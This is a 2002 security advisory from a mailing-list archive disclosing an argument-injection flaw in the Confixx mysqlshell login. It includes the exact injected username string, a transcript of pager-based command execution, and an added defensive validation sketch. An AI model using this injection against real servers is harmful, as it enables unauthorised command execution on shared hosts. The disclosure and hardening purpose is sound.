hi,

Information about Confixx (from http://www.confixx.de):
======================================================
Confixx is a comfortable tool to automate customer administration on
Linux-based webservers with graphic interfaces for Admin, Resellers and
End Users. Currently there are more than 4200 Confixx licenses registered.
More than 150 new licenses are added each week.

The problem:
===========
you can execute commands on a lot of confixx-boxes nearly without any
account.

you need to know:
- a webhostingprovider running confixx
- the password of the mysqlshell-user
- access to _any_ mysql-server

the password of the mysqlshell-user is the same for all customers.
normally you can't do anything with this account, if you don't have access
to one specific mysql-server. i even found one big german provider, which
uses 123456 as password on all his servers for the mysqlshell-account.

you have to add a user with the name "-e" on your mysql-server with the
password PASSWORD and read access to the table TABLE.

now you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password:   <-- enter here the password from the mysqlshell-user
Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

here you have to enter the following string:

-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

after that you get prompted for a password, enter your PASSWORD (from the
user "-e" on your mysql-server) here.

---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...

Vendor:
======
a customer, who uses confixx, informed the vendor about 20 months(!) ago.
confixx just added the following line:

export EDITOR="/bin/false";

so you can't use "edit;" at the mysql-prompt anymore and can't get an
interactive shell via vi. but you still can login without access to the
mysql-server on the attacked server and you can still execute commands on
this server.

Solution:
========
Delete the mysqlshell-user

This is the second problem i found in confixx without searching for
problems... When i have some spare time or i get paid for it, i will
search for further bugs, i am sure, there are more.

Thanks,
Ralf
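
Added example (not part of the original post and not Confixx's code): the report is consistent with a login wrapper that hands the typed "username" to the mysql client unquoted, so the sketch below shows how such input splits into separate client arguments and how a wrapper can validate the name and bind it to a single option instead. The function names, the web<digits> login pattern and DB_HOST are assumptions made for this illustration.

```sh
#!/bin/sh
# Hypothetical wrapper logic for illustration; nothing here runs mysql.
# Assumption: customer logins have the form web<digits> (e.g. "web1").

DB_HOST="localhost"   # assumed: fixed by the operator, never user input

# Assumed flaw: the prompt input is expanded unquoted, so the shell splits
# it on whitespace and every word becomes its own argument to the client.
unsafe_argv() {
    # Unquoted $1 on purpose: this is the defect being demonstrated.
    printf '%s\n' mysql -u $1 -p
}

# Accept only web<digits>; rejects empty input, anything starting with "-",
# and anything containing whitespace, "=", "\" or other characters.
valid_username() {
    case "$1" in
        web[0-9]*) digits=${1#web} ;;
        *) return 1 ;;
    esac
    case "$digits" in
        *[!0-9]*) return 1 ;;
    esac
    return 0
}

# Hardened form: validate first, then bind the name to --user= as one
# quoted word and pin the host, so input cannot add options or pick a server.
safe_argv() {
    valid_username "$1" || return 1
    printf '%s\n' mysql "--host=$DB_HOST" "--user=$1" --password
}

# Constructed sample input, using the placeholders from the post.
SAMPLE='-e -h IP_OF_YOUR_MYSQL_SERVER TABLE'

echo "unquoted expansion yields these arguments:"
unsafe_argv "$SAMPLE"
echo "validated wrapper:"
safe_argv "$SAMPLE" || echo "rejected: not a valid customer login"
safe_argv "web1"
```

Validation only closes the option-injection path; the shared mysqlshell password described in the post is a separate problem that this does not address.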
This archive was generated by hypermail 2b30 : Thu Jul 25 2002 - 09:36:36 PDT